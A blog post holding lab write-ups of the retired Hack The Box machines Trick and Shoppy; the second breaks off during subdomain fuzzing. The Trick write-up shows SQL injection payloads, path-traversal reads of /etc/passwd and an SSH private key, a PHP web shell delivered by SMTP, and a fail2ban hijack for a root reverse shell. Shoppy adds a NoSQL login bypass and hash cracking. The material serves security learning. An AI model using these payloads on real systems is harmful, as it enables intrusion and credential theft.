I had a lot of fun with this one and learnt a lot. I can honestly say though that I wouldn’t have had a clue what to do. The path to the user flag was very complicated. I realise the word ‘very’ is unessasary here but it was VERY complicated. We had to pivot through docker containers and learn how to use versioning in git. Wow. While I definitely don’t think this was easy, it was fun.

Hack The Box – Trick

Posted on January 14, 2025 by haxez

Hello world and welcome to haxez. I’m back, attempting to hack my way into the Hack The Box machine called Trick. It’s currently 7:00am on a Tuesday, I have work in a couple of hours but let’s see if we can smash this out before I have to go back to the 9–5. Please note, this isn’t a walkthrough. This is a retired machine write-up that I’m using to skill up.

Trick Enumeration

First, I pinged the box to make sure it was online and then ran a Nmap scan to see what services were listening. As you can see from the output below, SSH, SMTP, DNS and HTTP are open. Some ideas instantly sprang to mind such as enumerating users through SMTP and performing a DNS zone transfer.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sudo nmap -sC -sV -p- -O -A 10.129.245.209 -oA trick
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 07:05 GMT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 07:09 (0:00:51 remaining)
Nmap scan report for 10.129.245.209
Host is up (0.013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61ff293b36bd9dacfbde1f56884cae2d (RSA)
|   256 9ecdf2406196ea21a6ce2602af759a78 (ECDSA)
|_  256 7293f91158de34ad12b54b4a7364b970 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   12.44 ms 10.10.14.1
2   12.60 ms 10.129.245.209
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.61 seconds

Going in numerical order, I skipped over SSH because unless we brute force it, and have a password or private key, we aren’t getting in. I had a poke at SMTP but there was a weird delay when running commands. I believe I was able to VRFY the root user but I decided I would come back to this later if I needed to.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ nc 10.129.245.209 25
helo
220 debian.localdomain ESMTP Postfix (Debian/GNU)
501 Syntax: HELO hostname
HELO 10.129.245.209
250 debian.localdomain
VRFY root
252 2.0.0 root

That left me with DNS. I used the dig command to query the server for the server’s IP address. The output below shows that the server has a zone file for the domain trick.htb.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ dig @10.129.245.209 -x 10.129.245.209
; <<>> DiG 9.18.11-2~bpo11+1-Debian <<>> @10.129.245.209 -x 10.129.245.209
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48616
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 471a94ac095c0d0aa827a7e8641020d5aa7d0e001cec001a (good)
;; QUESTION SECTION:
;209.245.129.10.in-addr.arpa. IN PTR
;; ANSWER SECTION:
209.245.129.10.in-addr.arpa. 604800 IN PTR trick.htb.
;; AUTHORITY SECTION:
245.129.10.in-addr.arpa. 604800 IN NS trick.htb.
;; ADDITIONAL SECTION:
trick.htb.  604800 IN A 127.0.0.1
trick.htb.  604800 IN AAAA ::1
;; Query time: 16 msec
;; SERVER: 10.129.245.209#53(10.129.245.209) (UDP)
;; WHEN: Tue Mar 14 07:23:02 GMT 2023
;; MSG SIZE  rcvd: 165

I added trick.htb to my host file.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sudo echo '10.129.245.209 trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 trick.htb

As DNS TCP was open, I attempted to perform a zone transfer for trick.htb to see what other records there were in its zone file. The results below show the output of the host command. As you can see, there is a subdomain called preprod-payroll.trick.htb.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ host -t axfr trick.htb 10.129.245.209
Trying "trick.htb"
Using domain server:
Name: 10.129.245.209
Address: 10.129.245.209#53
Aliases: 
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47562
;; flags: qr aa; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;trick.htb.			IN	AXFR
;; ANSWER SECTION:
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
Received 192 bytes from 10.129.245.209#53 in 13 ms

I added this to my host file too.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sudo echo '10.129.245.209 preprod-payroll.trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 preprod-payroll.trick.htb

Walking The Websites

I visited the first website (trick.htb) and it didn’t appear that there was much there. It had an under-construction page.

I decided to skip further enumeration of this domain and visited the pre-production payroll website. If it’s pre-production then it’s still in development. If it’s still in development then it could have vulnerabilities. Not that production sites don’t have vulnerabilities but you know what I mean. As this page has a login form, but we don’t yet have credentials, I assume that it is vulnerable to SQL injection.

Trick Preproduction Payroll Application SQL Injection

Running an initial SQLMap scan against the application shows that the login parameters are vulnerable to SQL Injection. I followed the official walkthrough for this. It’s extremely cool how we go from finding SQL Injection to being able to read files. We start with a regular SQL injection. You can see from the results below that it found a time-based attack.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick/]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   
https://sqlmap.org---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc
---

Time-based attacks are slow we need to identify if there are any other methods that the server is vulnerable to. To do this we expand the techniques being used. As you can see below, we have now discovered that we have error-based and blind boolean-based SQL Injections.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --level 5 --risk 3 --technique=BEUS --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abcType: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc

So, in the official write-up, the author then goes on to check the privileges afforded to the SQL server user. As you can see below, the user has FILE privilege which allows them to read files. We can use this to read files that the user has permission to read on the server.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick/]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --privileges
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc
Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abc
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc
---
database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE

Using this method, we can retrieve the /etc/passwd file and see what users there are on the system. The more information we have the better.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --batch --file-read=/etc/passwd
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abc
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc
---
files saved to [1]:
[*] /home/haxez/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd

Let’s check out the passwd file.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ cat /home/haxez/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash

We can also use this method to read the ‘/etc/nginx/sites-enabled/default’ file. Now we can see what other sites are hosted on the server. As you can see, we have found another domain preprod-marketing.trick.htb. By the way, I wouldn’t have thought to check this file, we are on our third domain. I probably would have given up if I couldn’t get in with SQLI.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ cat _etc_nginx_sites-enabled_default
server {
	listen 80 default_server;
	listen [::]:80 default_server;
	server_name trick.htb;
	root /var/www/html;
	index index.html index.htm index.nginx-debian.html;
	server_name _;
	location / {
		try_files $uri $uri/ =404;
	}
	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		fastcgi_pass unix:/run/php/php7.3-fpm.sock;
	}
}
server {
	listen 80;
	listen [::]:80;
	server_name preprod-marketing.trick.htb;
	root /var/www/market;
	index index.php;
	location / {
		try_files $uri $uri/ =404;
	}
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}
server {
        listen 80;
        listen [::]:80;
        server_name preprod-payroll.trick.htb;
        root /var/www/payroll;
        index index.php;
        location / {
                try_files $uri $uri/ =404;
        }
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

Trick Preprod-Marketing Server Side Includes

Let’s echo that new subdomain/virtual host to our hosts’ file.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ echo '10.129.245.209 preprod-marketing.trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 preprod-marketing.trick.htb

So, we can now visit this site and see what’s occurring. The image below shows the site and something interesting about the way it is retrieving the about page. As you can see below, rather than having a path to the file like “example.com/about.html” it is using a PHP parameter to retrieve the page. This is suspicious and it is likely performing a server-side include. Hopefully, we can exploit this to perform local file inclusion.

First, I attempted to grab the ‘/etc/passwd’ file using the standard ‘/../../../etc/passwd’. However, this didn’t work so I assumed that there was some type of filtering taking place. Next, I doubled down on this attack and doubled up our characters we are able to perform local file inclusion to get the /etc/passwd file. This is great but it doesn’t really get us anything. We can’t upload a shell to the server.

http://preprod-marketing.trick.htb/index.php?page=//....//....//....//....//....//....//....//....//etc/passwd

SMTP Magic Trick

Do you want to see a magic trick? remember that SMTP port earlier? well, we can use it to write a shell that we can then call with the local file inclusion. Yeah, I was amazed by this. So we need to nc back to the SMTP port and craft an email.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ nc trick.htb 25
helo
220 debian.localdomain ESMTP Postfix (Debian/GNU)
mail from: haxez
250 2.1.0 Ok
rcpt to: michael
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 4935F4099C

Next, we create our listener so that when our reverse shell comes back from our PHP Web Shell, it has a friend to talk to.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sudo nc -lvnp 1337
listening on [any] 1337 ...

And finally, we run the command that tricks the system into connecting back to us. Then we should be able to use the PHP Web Shell to get a reverse shell. But, the instructions in the official walkthrough don’t work. This is a pretty common and unfortunate occurrence, unfortunately. You would expect the official walkthrough to be correct, wouldn’t you?

Moving On

It’s a shame that this didn’t work, I have read another article where the hacker used the same technique and it worked but I can’t replicate it. So instead of banging my frustrated face up against a brick wall, I’m going to take the easy path. I will come back to this one later. We have local file inclusion and we know there is a user called Michael. Surely the webserver doesn’t have permission to access Michale’s private key.

http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//home/michael/.ssh/id_rsa

And now we have SSH access.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Trick]
└──╼ [★]$ cd ~/
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ sudo vim ssh.key
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ sudo chmod 600 ssh.key
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ sudo ssh -i ssh.key [email protected]
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
michael@trick:~$

Trick Privilege Escalation

Ok, we now have access to the Michael user. We can run sudo -l and see what we can run. As you can see below, we can restart the fail2ban service as root without a password.

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

Ok, let’s take a look at the permissions within the fail2ban directory.

michael@trick:/etc/fail2ban$ ls -laSH
total 76
-rw-r--r--   1 root root     22908 Mar 14 10:18 jail.conf
drwxr-xr-x 126 root root     12288 Mar 14 09:53 ..
drwxr-xr-x   6 root root      4096 Mar 14 10:18 .
drwxrwx---   2 root security  4096 Mar 14 10:18 action.d
drwxr-xr-x   2 root root      4096 Mar 14 10:18 fail2ban.d
drwxr-xr-x   3 root root      4096 Mar 14 10:18 filter.d
drwxr-xr-x   2 root root      4096 Mar 14 10:18 jail.d
-rw-r--r--   1 root root      2827 Mar 14 10:18 paths-common.conf
-rw-r--r--   1 root root      2334 Mar 14 10:18 fail2ban.conf
-rw-r--r--   1 root root       738 Mar 14 10:18 paths-opensuse.conf
-rw-r--r--   1 root root       645 Mar 14 10:18 paths-arch.conf
-rw-r--r--   1 root root       573 Mar 14 10:18 paths-debian.conf

The ‘action.d’ directory stands out as its group owner is security. Let’s check our group and see if we are in that group.

michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Cool, what now? Apparently the iptables-multiport.conf has a command in it that gets run when a user gets banned. If we can modify this value then we can run our own command by triggering a ban. I presume that is what we’re meant to do. However, we can’t edit this file but we can move it.

michael@trick:/etc/fail2ban/action.d$ mv iptables-multiport.conf .old
michael@trick:/etc/fail2ban/action.d$ cp .old iptables-multiport.conf
michael@trick:/etc/fail2ban/action.d$ ls -l iptables-multiport.conf
-rw-r--r-- 1 michael michael 1420 Mar 14 10:26 iptables-multiport.conf

This is wild, we now own the file but when we restart fail2ban, any commands in this file will still be executed as root right? I think. This is confusing.

Fail2ban to shell

Now we modify the ‘iptables-multiport.conf’ file and change ‘actionban’ value to /tmp/shell.sh. Then we create ‘shell.sh’ in /tmp which has a reverse shell back to our host.

michael@trick:/etc/fail2ban/action.d$ cd /tmp
michael@trick:/tmp$ vim shell.sh
michael@trick:/tmp$ chmod +x shell.sh 
michael@trick:/tmp$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.

We have now changed the behaviour of what happens when fail2ban tries to ban someone. Instead of banning them, it will launch our reverse shell. We can trigger this by brute-forcing SSH.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ crackmapexec ssh 10.129.245.222 -u haxez -p rockyou.txt
SSH         10.129.245.222  22     10.129.245.222   [*] SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:123456 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:12345 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:123456789 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:password Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:iloveyou Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:princess Authentication failed.

After a while, we get a shell back which we can use to capture the root flag.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/Trick]
└──╼ [★]$ sudo nc -lvnp 1337
[sudo] password for haxez: 
listening on [any] 1337 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.245.222] 53330
bash: cannot set terminal process group (1799): Inappropriate ioctl for device
bash: no job control in this shell
root@trick:/# cat /root/root.txt
cat /root/root.txt
f8f▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓694

Trick Review

I will keep this short as I have work today. it’s 9:50 so it didn’t take me long to complete but I wouldn’t have had a clue without the official walkthrough. This is yet another easy box which isn’t easy. Perhaps when I complete them all I will actually have a methodology to solve these crazy boxes. Anyway, it was fun I guess, I enjoyed the DNS enumeration and would have loved for the SMTP trick to work. Anyway, I’m done. Time to look for a new career because I clearly suck at hacking.

Hack The Box – Shoppy

Posted on January 14, 2025January 14, 2025 by haxez

Hello world and welcome to Haxez, today I’m going to be working through the retired Hack The Box Machine Shoppy. I’m currently going through all the retired machines to try and upskill myself while studying the CPTS academy material. It’s also great to see the effort that has gone into making these machines. Each machine is like an episode of your favourite TV show, you don’t want to miss anything. Please note that I followed IppSec’s Shoppy Youtube video when getting stuck.

Shoppy Enumeration

Once the machine has started I connected to the VPN and started pinging the box to make sure I could talk to it. After confirming the box was online, I scanned it with Nmap to see what services were listening. As you can see from the output below, SSH and HTTP were open.

Nmap scan report for 10.129.227.233
Host is up, received echo-reply ttl 63 (0.013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: nginx/1.23.1
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

As HTTP was the only thing open that had a sensible attack surface, I visited the machine’s IP address in my browser. Unfortunately, I got an error due to a redirect in place. In order to resolve this, I echoed the domain name into my host file with the IP address of the box. This would ensure that the domain resolves to the correct IP address and that the redirect works.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo echo "10.129.227.233 shoppy.htb" | sudo tee -a /etc/hosts
10.129.227.233 shoppy.htb

Upon visiting the domain, I was presented with a countdown. No discernible technology was evident. I viewed the page source and looked at the various javascript files but couldn’t identify a framework or cms.

Whatweb didn’t provide much information either.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo whatweb http://shoppy.htb
http://shoppy.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.23.1], IP[10.129.227.233], JQuery, Script, Title[Shoppy Wait Page][Title element contains newline(s)!], nginx[1.23.1]

I started poking the application with various strings to attempt to force an error. The generic 404 error returns the response “Cannot GET” followed by the requested file. From this, we can deduce that the application was built with Node.js.

No Access to No SQLI

Next, I ran gobuster against the application to see if there were any hidden directories or files. As seen below, the results of gobuster found an admin and login area as well as some other generic files. It’s probably safe to assume that the login admin area is where the creator of the box wants us to go.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo gobuster dir -u http://shoppy.htb/ -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/11 09:36:20 Starting gobuster in directory enumeration mode
===============================================================
/Admin                (Status: 302) [Size: 28] [--> /login]
/admin                (Status: 302) [Size: 28] [--> /login]
/ADMIN                (Status: 302) [Size: 28] [--> /login]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/favicon.ico          (Status: 200) [Size: 213054]             
/fonts                (Status: 301) [Size: 177] [--> /fonts/]  
/images               (Status: 301) [Size: 179] [--> /images/] 
/js                   (Status: 301) [Size: 171] [--> /js/]     
/Login                (Status: 200) [Size: 1074]               
/login                (Status: 200) [Size: 1074]                                                   
===============================================================
2023/03/11 09:36:30 Finished

The login area didn’t give much away. For a moment, I thought I was logging in to my Activision/Blizzard account. So next, I started poking at the parameters of the login box. Initially, I captured it with Burp and tried the usual suspects, code execution and SQL injection. However, this is Node.js and is likely to use a NoSQL database. Admittedly, I didn’t know that until I watched a video about it. Anyway, the application login can be bypassed with ‘admin’||’1’==1’.

Once inside the application, I had access to a search box that lets you search for users. Searching for admin gave me the admin password hash. We can also perform a SQL injection on this form too and get it to spit out the other users of the application.

Hash Cracking

To proceed, I saved the hashes into a file and used John and rockyou.txt to crack them. As shown below, John was only able to crack one of the hashes. I will come back to the other one later and use a large wordlist if necessary.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo john --format=Raw-MD5 hashesh --wordlist=/media/sf_OneDrive/Wordlist/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
remembermethisway (?)
1g 0:00:00:23 DONE (2023-03-11 11:30) 0.04286g/s 614801p/s 614801c/s 649613C/s  filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

We can use Josh’s password to login into the application but it only provides us with the same functionality we had before. Time to go back to information gathering.

Shoppy Further Enumeration

In order to proceed, I used the ffuf fuzzing tool to brute force subdomains. As you can see from the output below, it found the subdomain of mattermost. I’ve heard of mattermost but I can’t remember ever using it. I believe it is some type of chat application.

┌─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo ffuf -u http://shoppy.htb/ -H "Host: FUZZ.shoppy.htb" -w /media/sf_OneDrive/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fw 5
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/  
v1.4.1-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://shoppy.htb/
 :: Wordlist         : FUZZ: /media/sf_OneDrive/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 5
________________________________________________
